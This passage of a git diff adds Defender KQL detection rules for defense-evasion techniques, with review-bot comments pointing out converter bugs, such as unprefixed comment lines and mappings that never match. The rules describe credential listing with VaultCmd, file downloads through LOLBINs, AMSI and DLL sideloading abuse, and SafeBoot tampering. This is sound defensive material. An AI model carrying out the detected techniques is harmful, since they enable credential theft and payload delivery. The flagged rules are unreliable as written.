+| where ProcessCommandLine contains "/listcreds:" and (FolderPath endswith "\\VaultCmd.exe" or ProcessVersionInfoOriginalFileName =~ "VAULTCMD.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/_rdp_file_created_by_uncommon_application.kql b/KQL/rules/Defense Evasion/_rdp_file_created_by_uncommon_application.kql
new file mode 100644
index 00000000..fae1af62
--- /dev/null
+++ b/KQL/rules/Defense Evasion/_rdp_file_created_by_uncommon_application.kql
@@ -0,0 +1,11 @@
+// Title: .RDP File Created By Uncommon Application
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-18
+// Level: high
+// Description: Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\CCleaner Browser\\Application\\CCleanerBrowser.exe" or InitiatingProcessFolderPath endswith "\\chromium.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\Google\\Chrome\\Application\\chrome.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\microsoftedge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\Opera.exe" or InitiatingProcessFolderPath endswith "\\Vivaldi.exe" or InitiatingProcessFolderPath endswith "\\Whale.exe" or InitiatingProcessFolderPath endswith "\\olk.exe" or InitiatingProcessFolderPath endswith "\\Outlook.exe" or InitiatingProcessFolderPath endswith "\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "\\Thunderbird.exe" or InitiatingProcessFolderPath endswith "\\Discord.exe" or InitiatingProcessFolderPath endswith "\\Keybase.exe" or InitiatingProcessFolderPath endswith "\\msteams.exe" or InitiatingProcessFolderPath endswith "\\Slack.exe" or InitiatingProcessFolderPath endswith "\\teams.exe") and FolderPath endswith ".rdp"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/abused_debug_privilege_by_arbitrary_parent_processes.kql b/KQL/rules/Defense Evasion/abused_debug_privilege_by_arbitrary_parent_processes.kql
new file mode 100644
index 00000000..ab1041ea
--- /dev/null
+++ b/KQL/rules/Defense Evasion/abused_debug_privilege_by_arbitrary_parent_processes.kql
@@ -0,0 +1,10 @@
+// Title: Abused Debug Privilege by Arbitrary Parent Processes
+// Author: Semanur Guneysu @semanurtg, oscd.community
+// Date: 2020-10-28
+// Level: high
+// Description: Detection of unusual child processes by different system processes
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548
+
+DeviceProcessEvents
+| where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "Cmd.Exe"))) and ((InitiatingProcessFolderPath endswith "\\winlogon.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\smss.exe" or InitiatingProcessFolderPath endswith "\\wininit.exe" or InitiatingProcessFolderPath endswith "\\spoolsv.exe" or InitiatingProcessFolderPath endswith "\\searchindexer.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI"))) and (not((ProcessCommandLine contains " route " and ProcessCommandLine contains " ADD ")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/abusing_print_executable.kql b/KQL/rules/Defense Evasion/abusing_print_executable.kql
new file mode 100644
index 00000000..c16b9ebe
--- /dev/null
+++ b/KQL/rules/Defense Evasion/abusing_print_executable.kql
@@ -0,0 +1,10 @@
+// Title: Abusing Print Executable
+// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative
+// Date: 2020-10-05
+// Level: medium
+// Description: Attackers can use print.exe for remote file copy
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "/D" and ProcessCommandLine contains ".exe") and ProcessCommandLine startswith "print" and FolderPath endswith "\\print.exe") and (not(ProcessCommandLine contains "print.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/add_insecure_download_source_to_winget.kql b/KQL/rules/Defense Evasion/add_insecure_download_source_to_winget.kql
new file mode 100644
index 00000000..a3af7520
--- /dev/null
+++ b/KQL/rules/Defense Evasion/add_insecure_download_source_to_winget.kql
@@ -0,0 +1,14 @@
+// Title: Add Insecure Download Source To Winget
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-17
+// Level: high
+// Description: Detects usage of winget to add a new insecure (http) download source.
+Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059
+// False Positives:
+// - False positives might occur if the users are unaware of such control checks
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add " and ProcessCommandLine contains "http://") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/add_new_download_source_to_winget.kql b/KQL/rules/Defense Evasion/add_new_download_source_to_winget.kql
new file mode 100644
index 00000000..ee5872f8
--- /dev/null
+++ b/KQL/rules/Defense Evasion/add_new_download_source_to_winget.kql
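Review bot: In the Add Insecure Download Source To Winget hunk the second line of the description, `Winget will not allow the addition of insecure sources, ...`, was written without the `//` prefix, so it is a bare sentence in the query body and the file will not parse as KQL. The converter needs to prefix every line of a multi-line description, giving `// Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)` here. The Audit Policy Tampering Via Auditpol and Audit Policy Tampering Via NT Resource Kit Auditpol hunks at the end of this chunk have the same unprefixed continuation line (`This can be carried out by selectively disabling/removing ...`). A quick check that every non-blank line before the table name starts with `//` would catch this class of error across the generated rule set.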
@@ -0,0 +1,12 @@
+// Title: Add New Download Source To Winget
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-17
+// Level: medium
+// Description: Detects usage of winget to add new additional download sources
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059
+// False Positives:
+// - False positive are expected with legitimate sources
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add ") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/add_potential_suspicious_new_download_source_to_winget.kql b/KQL/rules/Defense Evasion/add_potential_suspicious_new_download_source_to_winget.kql
new file mode 100644
index 00000000..a18d27f0
--- /dev/null
+++ b/KQL/rules/Defense Evasion/add_potential_suspicious_new_download_source_to_winget.kql
@@ -0,0 +1,10 @@
+// Title: Add Potential Suspicious New Download Source To Winget
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-17
+// Level: medium
+// Description: Detects usage of winget to add new potentially suspicious download sources
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add ") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") and ProcessCommandLine matches regex "://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/add_safeboot_keys_via_reg_utility.kql b/KQL/rules/Defense Evasion/add_safeboot_keys_via_reg_utility.kql
new file mode 100644
index 00000000..548ac8af
--- /dev/null
+++ b/KQL/rules/Defense Evasion/add_safeboot_keys_via_reg_utility.kql
@@ -0,0 +1,12 @@
+// Title: Add SafeBoot Keys Via Reg Utility
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-02
+// Level: high
+// Description: Detects execution of "reg.exe" commands with the "add" or "copy" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " copy " or ProcessCommandLine contains " add ") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/addinutil_exe_execution_from_uncommon_directory.kql b/KQL/rules/Defense Evasion/addinutil_exe_execution_from_uncommon_directory.kql
new file mode 100644
index 00000000..1c181326
--- /dev/null
+++ b/KQL/rules/Defense Evasion/addinutil_exe_execution_from_uncommon_directory.kql
@@ -0,0 +1,10 @@
+// Title: AddinUtil.EXE Execution From Uncommon Directory
+// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
+// Date: 2023-09-18
+// Level: medium
+// Description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\addinutil.exe" or ProcessVersionInfoOriginalFileName =~ "AddInUtil.exe") and (not((FolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\" or FolderPath contains ":\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/ads_zone_identifier_deleted_by_uncommon_application.kql b/KQL/rules/Defense Evasion/ads_zone_identifier_deleted_by_uncommon_application.kql
new file mode 100644
index 00000000..d0c05759
--- /dev/null
+++ b/KQL/rules/Defense Evasion/ads_zone_identifier_deleted_by_uncommon_application.kql
@@ -0,0 +1,12 @@
+// Title: ADS Zone.Identifier Deleted By Uncommon Application
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-04
+// Level: medium
+// Description: Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004
+// False Positives:
+// - Other third party applications not listed.
+
+DeviceFileEvents
+| where FolderPath endswith ":Zone.Identifier" and (not((InitiatingProcessFolderPath in~ ("C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "C:\\Windows\\SysWOW64\\explorer.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", "C:\\Program Files\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/agentexecutor_powershell_execution.kql b/KQL/rules/Defense Evasion/agentexecutor_powershell_execution.kql
new file mode 100644
index 00000000..408b1e6b
--- /dev/null
+++ b/KQL/rules/Defense Evasion/agentexecutor_powershell_execution.kql
@@ -0,0 +1,12 @@
+// Title: AgentExecutor PowerShell Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), memory-shards
+// Date: 2022-12-24
+// Level: medium
+// Description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate use via Intune management. You exclude script paths and names to reduce FP rate
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -powershell" or ProcessCommandLine contains " -remediationScript") and (FolderPath =~ "\\AgentExecutor.exe" or ProcessVersionInfoOriginalFileName =~ "AgentExecutor.exe")) and (not(InitiatingProcessFolderPath endswith "\\Microsoft.Management.Services.IntuneWindowsAgent.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/always_install_elevated_msi_spawned_cmd_and_powershell.kql b/KQL/rules/Defense Evasion/always_install_elevated_msi_spawned_cmd_and_powershell.kql
new file mode 100644
index 00000000..69e25b00
--- /dev/null
+++ b/KQL/rules/Defense Evasion/always_install_elevated_msi_spawned_cmd_and_powershell.kql
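Review bot: `FolderPath =~ "\\AgentExecutor.exe"` compares the full image path for equality with a bare file name, so that side of the disjunction can never be true and the rule only fires when `ProcessVersionInfoOriginalFileName` happens to be populated with the expected value. Every other image check in this patch uses `FolderPath endswith` for the same Sigma pattern, so this looks like a converter slip on an `Image|endswith` modifier; change it to `FolderPath endswith "\\AgentExecutor.exe"`. It may be worth grepping the generated rules for `FolderPath =~ "\\` to find any other instances.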
@@ -0,0 +1,10 @@
+// Title: Always Install Elevated MSI Spawned Cmd And Powershell
+// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community
+// Date: 2020-10-13
+// Level: medium
+// Description: Detects Windows Installer service (msiexec.exe) spawning "cmd" or "powershell"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll"))) and ((InitiatingProcessFolderPath contains "\\Windows\\Installer\\" and InitiatingProcessFolderPath contains "msi") and InitiatingProcessFolderPath endswith "tmp")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/always_install_elevated_windows_installer.kql b/KQL/rules/Defense Evasion/always_install_elevated_windows_installer.kql
new file mode 100644
index 00000000..d620caf0
--- /dev/null
+++ b/KQL/rules/Defense Evasion/always_install_elevated_windows_installer.kql
@@ -0,0 +1,14 @@
+// Title: Always Install Elevated Windows Installer
+// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community
+// Date: 2020-10-13
+// Level: medium
+// Description: Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+// False Positives:
+// - System administrator usage
+// - Anti virus products
+// - WindowsApps located in "C:\Program Files\WindowsApps\"
+
+DeviceProcessEvents
+| where (((FolderPath contains "\\Windows\\Installer\\" and FolderPath contains "msi") and FolderPath endswith "tmp") or (FolderPath endswith "\\msiexec.exe" and (ProcessIntegrityLevel in~ ("System", "S-1-16-16384")))) and (AccountName contains "AUTHORI" or AccountName contains "AUTORI") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files\\Avast Software\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Avast Software\\") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Avira\\" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\Google\\Update\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Google\\Update\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\services.exe" or (ProcessCommandLine endswith "\\system32\\msiexec.exe /V" or InitiatingProcessCommandLine endswith "\\system32\\msiexec.exe /V") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Sophos\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/amsi_dll_loaded_via_lolbin_process.kql b/KQL/rules/Defense Evasion/amsi_dll_loaded_via_lolbin_process.kql
new file mode 100644
index 00000000..e1bcca0c
--- /dev/null
+++ b/KQL/rules/Defense Evasion/amsi_dll_loaded_via_lolbin_process.kql
@@ -0,0 +1,10 @@
+// Title: Amsi.DLL Loaded Via LOLBIN Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-01
+// Level: medium
+// Description: Detects loading of "Amsi.dll" by a living of the land process. This could be an indication of a "PowerShell without PowerShell" attack
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\amsi.dll" and (InitiatingProcessFolderPath endswith "\\ExtExport.exe" or InitiatingProcessFolderPath endswith "\\odbcconf.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql b/KQL/rules/Defense Evasion/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql
new file mode 100644
index 00000000..b2d5e948
--- /dev/null
+++ b/KQL/rules/Defense Evasion/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql
@@ -0,0 +1,13 @@
+// Title: Antivirus Filter Driver Disallowed On Dev Drive - Registry
+// Author: @kostastsale, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-11-05
+// Level: high
+// Description: Detects activity that indicates a user disabling the ability for Antivirus mini filter to inspect a "Dev Drive".
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\FilterManager\\FltmgrDevDriveAllowAntivirusFilter"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/arbitrary_dll_or_csproj_code_execution_via_dotnet_exe.kql b/KQL/rules/Defense Evasion/arbitrary_dll_or_csproj_code_execution_via_dotnet_exe.kql
new file mode 100644
index 00000000..5492f416
--- /dev/null
+++ b/KQL/rules/Defense Evasion/arbitrary_dll_or_csproj_code_execution_via_dotnet_exe.kql
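Review bot: In the Antivirus Filter Driver Disallowed On Dev Drive hunk, `RegistryValueData =~ "DWORD (0x00000000)"` is the Sysmon rendering of a DWORD, whereas `DeviceRegistryEvents` (to my knowledge) stores the numeric string in `RegistryValueData` with the type in `RegistryValueType`, so this condition is unlikely to ever match in Defender. The value name is also part of the `RegistryKey` check here, but in this table the key path and the value name are separate columns; a closer mapping is `RegistryKey endswith "\\FilterManager" and RegistryValueName =~ "FltmgrDevDriveAllowAntivirusFilter" and RegistryValueType == "Dword" and RegistryValueData == "0"`, to be confirmed against a captured event before merging. The Windows Credential Editor Registry hunk above (`RegistryKey contains "Services\\WCESERVICE\\Start"`) has the same value-name-in-key-path issue. Both point at a converter-level mapping of Sigma `TargetObject`/`Details` that would be better fixed once in the script than per rule.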
@@ -0,0 +1,12 @@
+// Title: Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE
+// Author: Beyu Denis, oscd.community
+// Date: 2020-10-18
+// Level: medium
+// Description: Detects execution of arbitrary DLLs or unsigned code via a ".csproj" files via Dotnet.EXE.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate administrator usage
+
+DeviceProcessEvents
+| where ((ProcessCommandLine endswith ".csproj" or ProcessCommandLine endswith ".csproj\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".csproj'" or ProcessCommandLine endswith ".dll'") and (FolderPath endswith "\\dotnet.exe" or ProcessVersionInfoOriginalFileName =~ ".NET Host")) and (not(((ProcessCommandLine contains "C:\\ProgramData\\CSScriptNpp\\" and ProcessCommandLine contains "-cscs_path:" and ProcessCommandLine contains "\\cs-script\\cscs.dll") and (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Notepad++\\notepad++.exe", "C:\\Program Files\\Notepad++\\notepad++.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_imewdbld_exe.kql b/KQL/rules/Defense Evasion/arbitrary_file_download_via_imewdbld_exe.kql
new file mode 100644
index 00000000..7ad1a4e9
--- /dev/null
+++ b/KQL/rules/Defense Evasion/arbitrary_file_download_via_imewdbld_exe.kql
@@ -0,0 +1,10 @@
+// Title: Arbitrary File Download Via IMEWDBLD.EXE
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2023-11-09
+// Level: high
+// Description: Detects usage of "IMEWDBLD.exe" to download arbitrary files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\IMEWDBLD.exe" or ProcessVersionInfoOriginalFileName =~ "imewdbld.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_msedge_proxy_exe.kql b/KQL/rules/Defense Evasion/arbitrary_file_download_via_msedge_proxy_exe.kql
new file mode 100644
index 00000000..d60733b3
--- /dev/null
+++ b/KQL/rules/Defense Evasion/arbitrary_file_download_via_msedge_proxy_exe.kql
@@ -0,0 +1,10 @@
+// Title: Arbitrary File Download Via MSEDGE_PROXY.EXE
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2023-11-09
+// Level: medium
+// Description: Detects usage of "msedge_proxy.exe" to download arbitrary files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\msedge_proxy.exe" or ProcessVersionInfoOriginalFileName =~ "msedge_proxy.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_msohtmed_exe.kql b/KQL/rules/Defense Evasion/arbitrary_file_download_via_msohtmed_exe.kql
new file mode 100644
index 00000000..13bfc92f
--- /dev/null
+++ b/KQL/rules/Defense Evasion/arbitrary_file_download_via_msohtmed_exe.kql
@@ -0,0 +1,10 @@
+// Title: Arbitrary File Download Via MSOHTMED.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: medium
+// Description: Detects usage of "MSOHTMED" to download arbitrary files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\MSOHTMED.exe" or ProcessVersionInfoOriginalFileName =~ "MsoHtmEd.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_mspub_exe.kql b/KQL/rules/Defense Evasion/arbitrary_file_download_via_mspub_exe.kql
new file mode 100644
index 00000000..0c4f3350
--- /dev/null
+++ b/KQL/rules/Defense Evasion/arbitrary_file_download_via_mspub_exe.kql
@@ -0,0 +1,10 @@
+// Title: Arbitrary File Download Via MSPUB.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: medium
+// Description: Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\MSPUB.exe" or ProcessVersionInfoOriginalFileName =~ "MSPUB.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_presentationhost_exe.kql b/KQL/rules/Defense Evasion/arbitrary_file_download_via_presentationhost_exe.kql
new file mode 100644
index 00000000..bf1c0eb9
--- /dev/null
+++ b/KQL/rules/Defense Evasion/arbitrary_file_download_via_presentationhost_exe.kql
@@ -0,0 +1,10 @@
+// Title: Arbitrary File Download Via PresentationHost.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: medium
+// Description: Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "ftp://") and (FolderPath endswith "\\presentationhost.exe" or ProcessVersionInfoOriginalFileName =~ "PresentationHost.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_squirrel_exe.kql b/KQL/rules/Defense Evasion/arbitrary_file_download_via_squirrel_exe.kql
new file mode 100644
index 00000000..381c132f
--- /dev/null
+++ b/KQL/rules/Defense Evasion/arbitrary_file_download_via_squirrel_exe.kql
@@ -0,0 +1,13 @@
+// Title: Arbitrary File Download Via Squirrel.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community
+// Date: 2022-06-09
+// Level: medium
+// Description: Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+// False Positives:
+// - Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.)
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " --download " or ProcessCommandLine contains " --update " or ProcessCommandLine contains " --updateRollback=") and ProcessCommandLine contains "http" and (FolderPath endswith "\\squirrel.exe" or FolderPath endswith "\\update.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/aruba_network_service_potential_dll_sideloading.kql b/KQL/rules/Defense Evasion/aruba_network_service_potential_dll_sideloading.kql
new file mode 100644
index 00000000..0674ea72
--- /dev/null
+++ b/KQL/rules/Defense Evasion/aruba_network_service_potential_dll_sideloading.kql
@@ -0,0 +1,10 @@
+// Title: Aruba Network Service Potential DLL Sideloading
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-22
+// Level: high
+// Description: Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.persistence, attack.t1574.001
+
+DeviceImageLoadEvents
+| where ((FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\msvcr100.dll" or FolderPath endswith "\\msvcp100.dll" or FolderPath endswith "\\dbghelp.dll" or FolderPath endswith "\\dbgcore.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\dpapi.dll") and InitiatingProcessFolderPath endswith "\\arubanetsvc.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/aspnetcompiler_execution.kql b/KQL/rules/Defense Evasion/aspnetcompiler_execution.kql
new file mode 100644
index 00000000..65278ddd
--- /dev/null
+++ b/KQL/rules/Defense Evasion/aspnetcompiler_execution.kql
@@ -0,0 +1,10 @@
+// Title: AspNetCompiler Execution
+// Author: frack113
+// Date: 2021-11-24
+// Level: medium
+// Description: Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+
+DeviceProcessEvents
+| where (FolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\") and FolderPath endswith "\\aspnet_compiler.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/assembly_loading_via_cl_loadassembly_ps1.kql b/KQL/rules/Defense Evasion/assembly_loading_via_cl_loadassembly_ps1.kql
new file mode 100644
index 00000000..52d6cf47
--- /dev/null
+++ b/KQL/rules/Defense Evasion/assembly_loading_via_cl_loadassembly_ps1.kql
@@ -0,0 +1,10 @@
+// Title: Assembly Loading Via CL_LoadAssembly.ps1
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-05-21
+// Level: medium
+// Description: Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different assemblies and bypass App locker controls.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "LoadAssemblyFromPath " or ProcessCommandLine contains "LoadAssemblyFromNS "
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/audit_policy_tampering_via_auditpol.kql b/KQL/rules/Defense Evasion/audit_policy_tampering_via_auditpol.kql
new file mode 100644
index 00000000..7ffb880d
--- /dev/null
